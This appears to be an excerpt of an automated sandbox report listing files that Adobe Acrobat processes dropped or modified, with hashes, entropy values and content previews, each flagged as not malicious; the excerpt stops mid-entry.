                                                                    Preview:MSCF............,...................I..................XaK .authroot.stl.[.i..6..CK..<Tk......4.cl!Kg..E..*Y.f_..".$mR"$.J.E.KB."..rKv.."{.g....3.W.....c..9.s...=....y6#..x..........D......\(.#.s.!.A.......cd.c........+^.ov...n.....3BL..0.......BPUR&.X..02.q...R...J.....w.....b.vy>....-.&..(..oe."."...J9...0U.6J..|U..S.....M.F8g...=.......p...........l.?3.J.x.G.Ep..$g..tj......)v]9(:.)W.8.Op.1Q..:.nPd........7.7..M].V F..g.....12..!7(...B.......h.RZ.......l.<.....6..Z^.`p?... .p.Gp.#.'.X..........|!.8.....".m.49r?.I...g...8.v.....a``.g.R4.i...J8q....NFW,E.6Y....!.o5%.Y.....R..<..S9....r....WO...(.....F..Q=*....-..7d..O(....-..+k.........K..........{Q....Z..j._.E...QZ.~.\.^......N.9.k..O.}dD.b1r...[}/....T..E..G..c.|.c.&>?..^t. ..;..X.d.E.0G....[Q.*,*......#.Dp..L.o|#syc.J............}G-.ou6.=52..XWi=...m.....^u......c..fc?&pR7S5....I...j.G........j.j..Tc.El.....B.pQ.,Bp....j...9g.. >..s..m#.Nb.o_u.M.V...........\#...v..Mo\sF..s....Y...
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:data
                                                                    Category:dropped
                                                                    Size (bytes):192
                                                                    Entropy (8bit):2.7425532007658724
                                                                    Encrypted:false
                                                                    SSDEEP:3:kkFklchKfllXlE/HT8kv37vNNX8RolJuRdxLlGB9lQRYwpDdt:kKFNT8m37VNMa8RdWBwRd
                                                                    MD5:966722F3EAFE518495B92E58002F7BB0
                                                                    SHA1:34C2129A65877ECF66FF5A12C1CBA259472B6C2B
                                                                    SHA-256:D9A427407715348F0EDA28A217B7A2854185B5A3F604766FA1D7FFB2E3895DD9
                                                                    SHA-512:D79B24105984A9FEAA4C078C56156417B73CAFA5D5BDF30107CCB0DF25BC2BA313978F466678B843AFD7819C63FA5F4BE274BB848FB90E827A390EDC780087E4
                                                                    Malicious:false
                                                                    Preview:p...... ........oQ..$Q..(....................................................... ..........W.....z..............o...h.t.t.p.:././.x.1...i...l.e.n.c.r...o.r.g./...".6.4.c.d.6.6.5.4.-.5.6.f."...
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                    File Type:data
                                                                    Category:modified
                                                                    Size (bytes):328
                                                                    Entropy (8bit):3.150184159866505
                                                                    Encrypted:false
                                                                    SSDEEP:6:kKuCbT9UswDLL+N+SkQlPlEGYRMY9z+4KlDA3RUebT3:DbqDnLNkPlE99SNxAhUe/3
                                                                    MD5:39FF6D4BCC64A1A13420CF85E7668553
                                                                    SHA1:BA2A760E313AB36990EB6747B28E8A6B5973ADF7
                                                                    SHA-256:FA412D30A4554DEB1F351A9DC9B826380CD94EABCB7F1B61960B969C0EB4E450
                                                                    SHA-512:2EDF857F49BFFEB2FCD62AB82F8925AE7A8D718EEE30E9EE98BEBF398A2011C1F078A11C7DCB5FEE51A718CC08DB260A923BA75EC4E9BACBD21F3B9859E688DA
                                                                    Malicious:false
                                                                    Preview:p...... .........gC.$Q..(....................................................... ........G..@.......&...............h.t.t.p.:././.c.t.l.d.l...w.i.n.d.o.w.s.u.p.d.a.t.e...c.o.m./.m.s.d.o.w.n.l.o.a.d./.u.p.d.a.t.e./.v.3./.s.t.a.t.i.c./.t.r.u.s.t.e.d.r./.e.n./.a.u.t.h.r.o.o.t.s.t.l...c.a.b...".a.7.2.8.2.e.b.4.0.b.1.d.a.1.:.0."...
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:PostScript document text
                                                                    Category:dropped
                                                                    Size (bytes):1233
                                                                    Entropy (8bit):5.233980037532449
                                                                    Encrypted:false
                                                                    SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                    MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                    SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                    SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                    SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                    Malicious:false
                                                                    Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:PostScript document text
                                                                    Category:dropped
                                                                    Size (bytes):1233
                                                                    Entropy (8bit):5.233980037532449
                                                                    Encrypted:false
                                                                    SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                    MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                    SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                    SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                    SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                    Malicious:false
                                                                    Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:PostScript document text
                                                                    Category:dropped
                                                                    Size (bytes):1233
                                                                    Entropy (8bit):5.233980037532449
                                                                    Encrypted:false
                                                                    SSDEEP:24:kk8id8HxPsMTtrid8OPgx4sMDHFidZxDWksMwEidMKRxCsMWaOtidMLgxT2sMW0l:pkxPhtgNgx4pyZxakazxCIK2gxap
                                                                    MD5:8BA9D8BEBA42C23A5DB405994B54903F
                                                                    SHA1:FC1B1646EC8A7015F492AA17ADF9712B54858361
                                                                    SHA-256:862DE2165B9D44422E84E25FFE267A5E1ADE23F46F04FC6F584C4943F76EB75C
                                                                    SHA-512:26AD41BB89AF6198515674F21B4F0F561DC9BDC91D5300C154065C57D49CCA61B4BA60E5F93FD17869BDA1123617F26CDA0EF39935A9C2805F930A3DB1956D5A
                                                                    Malicious:false
                                                                    Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:PostScript document text
                                                                    Category:dropped
                                                                    Size (bytes):10880
                                                                    Entropy (8bit):5.214360287289079
                                                                    Encrypted:false
                                                                    SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                    MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                    SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                    SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                    SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                    Malicious:false
                                                                    Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:PostScript document text
                                                                    Category:dropped
                                                                    Size (bytes):10880
                                                                    Entropy (8bit):5.214360287289079
                                                                    Encrypted:false
                                                                    SSDEEP:192:SgAYm4DAv6oq6oCf6ocL6oz6o46ok6o16ok6oKls6oVtfZ6ojtou6o2ti16oGwX/:SV548vvqvSvivzv4vkv1vkvKlsvVtfZp
                                                                    MD5:B60EE534029885BD6DECA42D1263BDC0
                                                                    SHA1:4E801BA6CA503BDAE7E54B7DB65BE641F7C23375
                                                                    SHA-256:B5F094EFF25215E6C35C46253BA4BB375BC29D055A3E90E08F66A6FDA1C35856
                                                                    SHA-512:52221F919AEA648B57E567947806F71922B604F90AC6C8805E5889AECB131343D905D94703EA2B4CEC9B0C1813DDA6EAE2677403F58D3B340099461BBCD355AE
                                                                    Malicious:false
                                                                    Preview:%!Adobe-FontList 1.23.%Locale:0x809..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-H.Registry:Adobe.Ordering:Identity.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-H.FileLength:8228.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:Identity-V.Registry:Adobe.Ordering:Identity.UseCMap:Identity-H.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\Identity-V.FileLength:2761.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UCS2-GBK-EUC.Registry:Adobe.Ordering:UCS2_GBK_EUC.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UCS2-GBK-EUC.FileLength:243835.FileModTime:1612212568.%EndFont..%BeginFont.Handler:DirectoryHandler.FontType:CMap.CMapName:UniKS-UTF16-H.Registry:Adobe.Ordering:Korea1.OutlineFileName:C:\Program Files\Adobe\Acrobat DC\Resource\CMap\UniKS-UTF16-H.FileLength:131902.FileModTime:1612212568.%EndFont..%BeginFont.Handler:D
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):295
                                                                    Entropy (8bit):5.312847565734726
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXFt2V+FY7A/4Ox+FIbRI6XVW7+0YAUUoAvJM3g98kUwPeUkwRe9:YvXKXFVW7M1UYpW7/UnGMbLUkee9
                                                                    MD5:B5D15339306B877C48DD77BF60B5AC68
                                                                    SHA1:740048C8145F807381D9FCC38A958115BAC89DBD
                                                                    SHA-256:C5274F7BC5E8AD189431A560596871FA725D91FFC12270BCBF658C9AEE1AF630
                                                                    SHA-512:E6D19153A71BA82770B6B96DF1D10A263377FDE30E66982DCF2DB70996FFBD95878AED4C60059D9DE58C0544E7CAD0C5F49FF6CE3F603FB671C03C1A054EAC07
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"2ac62332-ea0f-4f00-8867-ac75bedae226","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734682860941,"statusCode":200,"surfaceID":"ACROBAT_READER_MASTER_SURFACEID","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):294
                                                                    Entropy (8bit):5.248599753794346
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXFt2V+FY7A/4Ox+FIbRI6XVW7+0YAUUoAvJfBoTfXpnrPeUkwRe9:YvXKXFVW7M1UYpW7/UnGWTfXcUkee9
                                                                    MD5:DC9A20EBCAC1FC4F9BA252C4E5E6F210
                                                                    SHA1:4178D17BD243D46B8D4D86F4D0ACE8F6F17773BA
                                                                    SHA-256:584ED21D0EDFB6833C45376D6C6AC76E529CD5FE7097652732D9034BB53525AD
                                                                    SHA-512:1389654713C14814EBF6E882FFE84B2FEE2D1455BB5CC0C2E3E5BD6C0B67AC832E360C7B8FEF50F440587D70D7548C74CB0F770C15EAAC89FA0C0C2F0974243B
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"2ac62332-ea0f-4f00-8867-ac75bedae226","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734682860941,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):294
                                                                    Entropy (8bit):5.227420828839944
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXFt2V+FY7A/4Ox+FIbRI6XVW7+0YAUUoAvJfBD2G6UpnrPeUkwRe9:YvXKXFVW7M1UYpW7/UnGR22cUkee9
                                                                    MD5:4A51D646ED33E38CA193571F2046BED4
                                                                    SHA1:C872783720D85918CEE016862F6391EF51B83882
                                                                    SHA-256:B09FC34579D8CFFFAE16143409FEEB268D61218B25D50C6D2A85380842859822
                                                                    SHA-512:48A2217E7E4C7AA6D023BA35082D94496E638D725EB658935223F1A102CA801F15B6054637CF9A3E2A099B63ABC9973EEFBAED152C2CF0AD37ECEB15E5C9A0B2
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"2ac62332-ea0f-4f00-8867-ac75bedae226","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734682860941,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):285
                                                                    Entropy (8bit):5.289967958455945
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXFt2V+FY7A/4Ox+FIbRI6XVW7+0YAUUoAvJfPmwrPeUkwRe9:YvXKXFVW7M1UYpW7/UnGH56Ukee9
                                                                    MD5:2CFD650F7C7DF9E14230B9AD469FC673
                                                                    SHA1:BD3046AB82F17030367152DCC0B142CE906E67AC
                                                                    SHA-256:B9DC3F0D33FA21C33B705670D0AA66201A6EA1192C84AC8054598B4577E95270
                                                                    SHA-512:6D8D519BB8E6D5421B8F4CF4BE446CDBC8DE5166A2EA9D898AD24FCC2828F117FB2F2B9D4BAE7E82918DF81C4CCE0F70A3DD5ED4802D882617A7686EC232445D
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"2ac62332-ea0f-4f00-8867-ac75bedae226","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734682860941,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):1123
                                                                    Entropy (8bit):5.685279316558241
                                                                    Encrypted:false
                                                                    SSDEEP:24:Yv6X06Fi/UspLgE9cQx8LennAvzBvkn0RCmK8czOCCSG:Yv3cshgy6SAFv5Ah8cv/G
                                                                    MD5:17738238D997972D5040D767715CF825
                                                                    SHA1:D5B21FDDA277FA0D11BDFA3826BFD5FAC9377002
                                                                    SHA-256:16E9D050F9999A51AEE4471F9210ADDBB32AED3260103C2337C071120E8329C2
                                                                    SHA-512:550FE8FF4596EE053EE686BAA002E8B9AD1FA915635448846740A9BE1D7F6A51270DC90E624DA6D8595B6AB63310518256491E25F3AE6D2BDA32754DB1AE23CD
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"2ac62332-ea0f-4f00-8867-ac75bedae226","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734682860941,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):289
                                                                    Entropy (8bit):5.233823588730251
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXFt2V+FY7A/4Ox+FIbRI6XVW7+0YAUUoAvJf8dPeUkwRe9:YvXKXFVW7M1UYpW7/UnGU8Ukee9
                                                                    MD5:AFFD478AFE4B7E302E93984AB3BF69D7
                                                                    SHA1:D02C8C5C78E9D5651F0515C23099D062C0B8D025
                                                                    SHA-256:7CFD630F2F975894B8968511FE16FEC5CEA4731D6A71D29B723E91AAAEEA3ADB
                                                                    SHA-512:90C579F608DB81CA71EA17378F30FF3A7FDEDBD5EB7CFA4A1231338B888C248A3867E78DEFF444E26908B41DA8338C9D90314E5AD3DBAED6920CF652A5E42592
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"2ac62332-ea0f-4f00-8867-ac75bedae226","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734682860941,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):292
                                                                    Entropy (8bit):5.23576768217988
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXFt2V+FY7A/4Ox+FIbRI6XVW7+0YAUUoAvJfQ1rPeUkwRe9:YvXKXFVW7M1UYpW7/UnGY16Ukee9
                                                                    MD5:6DBF3271FE1776958CA2B006795D77F9
                                                                    SHA1:B308E84FEA0AB2824842F403E40F6D347B923201
                                                                    SHA-256:A03BD7CD0B0BA3D17198A0D98BE89D16CB02D30944A0074394FB93DA00EDE45C
                                                                    SHA-512:58439DBA8D83FE3F11B74009315ADA073F480BA5AB277694DB53D1A4FB6911E6EDA9FC89D3D222BFAB8B9807E5C2A4B8A49D4753C337D5D29DFDAC861CC75D75
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"2ac62332-ea0f-4f00-8867-ac75bedae226","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734682860941,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):289
                                                                    Entropy (8bit):5.255345817660176
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXFt2V+FY7A/4Ox+FIbRI6XVW7+0YAUUoAvJfFldPeUkwRe9:YvXKXFVW7M1UYpW7/UnGz8Ukee9
                                                                    MD5:49AB6E313046DC0B1E34EBA7280E9297
                                                                    SHA1:A58CDF25F40BF0DC7EF19368D58BC3AFBC167436
                                                                    SHA-256:DAE37FF20777D6933CC906107045BF79CB31DE0EA3BAA5250893032B428ED8DC
                                                                    SHA-512:84BB7D464EDE08805E34537F763F17A0FC07EAD259206A01421EB3024987D57D7B9853755466C9C2440554AB8FDD1CEA903A72E4333CF2C6D988FDEDA5C7D657
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"2ac62332-ea0f-4f00-8867-ac75bedae226","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734682860941,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):295
                                                                    Entropy (8bit):5.261534802941264
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXFt2V+FY7A/4Ox+FIbRI6XVW7+0YAUUoAvJfzdPeUkwRe9:YvXKXFVW7M1UYpW7/UnGb8Ukee9
                                                                    MD5:8FE527E74B8E1EC7928466BD936225D9
                                                                    SHA1:3B6D3EDEC705DEDA317EC9B73AA5A7FEC8A28E03
                                                                    SHA-256:B93A08E11DBB8B86C40453E136A204FBDEE382E9CB42B33401F32FD1EF10D662
                                                                    SHA-512:4DDE8E42538A831E1C0CAE130512AE0D083E84A25BFC02A55F5C9CB8503B4CDF9BB63B9C7E16096E2B6FD5EC8E0BC78543334D9F7AA053BE6A632A07A45A44AD
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"2ac62332-ea0f-4f00-8867-ac75bedae226","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734682860941,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):289
                                                                    Entropy (8bit):5.241518284503011
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXFt2V+FY7A/4Ox+FIbRI6XVW7+0YAUUoAvJfYdPeUkwRe9:YvXKXFVW7M1UYpW7/UnGg8Ukee9
                                                                    MD5:992D6B9E5B874BA0940A69A21D6D78F6
                                                                    SHA1:A2F26DEE352D078A57AF993527F1FD098AFB9F70
                                                                    SHA-256:D783AEF42324674F6642686BA8BF204B3111C29B2E271AD3BC98BE4AA82C634D
                                                                    SHA-512:FE92E214555C309EC0F235548640DD53B1BA6A1BBD9CECD6331822F4C0FCA4274669B3214E0D9EDACDA9AB8381CAFB477659E3F930FA691563B90F064270DAC6
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"2ac62332-ea0f-4f00-8867-ac75bedae226","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734682860941,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):284
                                                                    Entropy (8bit):5.227120403279144
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXFt2V+FY7A/4Ox+FIbRI6XVW7+0YAUUoAvJf+dPeUkwRe9:YvXKXFVW7M1UYpW7/UnG28Ukee9
                                                                    MD5:A054F40C9A7085E7DF73DDA037002458
                                                                    SHA1:3BA3A646E46552E456382EB763F0E696C774D009
                                                                    SHA-256:3816FC0CEEEB65F4A47923A50E782AF5E1F1F3367FC0761950F3FA0E8FE5B037
                                                                    SHA-512:5B63B0BF7DDC3D3B5E2BF519BD6C9B4A78A881BD3909DEDC080D11FE7D535766B64AB2582C292EB4CB87C67446FC5D465EF962B7C7407B0410B189FF381D620B
                                                                    Malicious:false
                                                                    Preview:{"analyticsData":{"responseGUID":"2ac62332-ea0f-4f00-8867-ac75bedae226","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1734682860941,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                    Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                    File Type:JSON data
                                                                    Category:dropped
                                                                    Size (bytes):291
                                                                    Entropy (8bit):5.225467318365856
                                                                    Encrypted:false
                                                                    SSDEEP:6:YEQXJ2HXFt2V+FY7A/4Ox+FIbRI6XVW7+0YAUUoAvJfbPtdPeUkwRe9:YvXKXFVW7M1UYpW7/UnGDV8Ukee9
                                                                    MD5:7CFF1DD6F66B96611A2AF7830E10BF15
                                                                    SHA1:2837029C621A5FDD4874B7A3C8D6180EFAA5CBD0
                                                                    SHA-256:FCF598596C063D02F71681F5352939784BE8C61012DA5431394CF527ECFEAB77
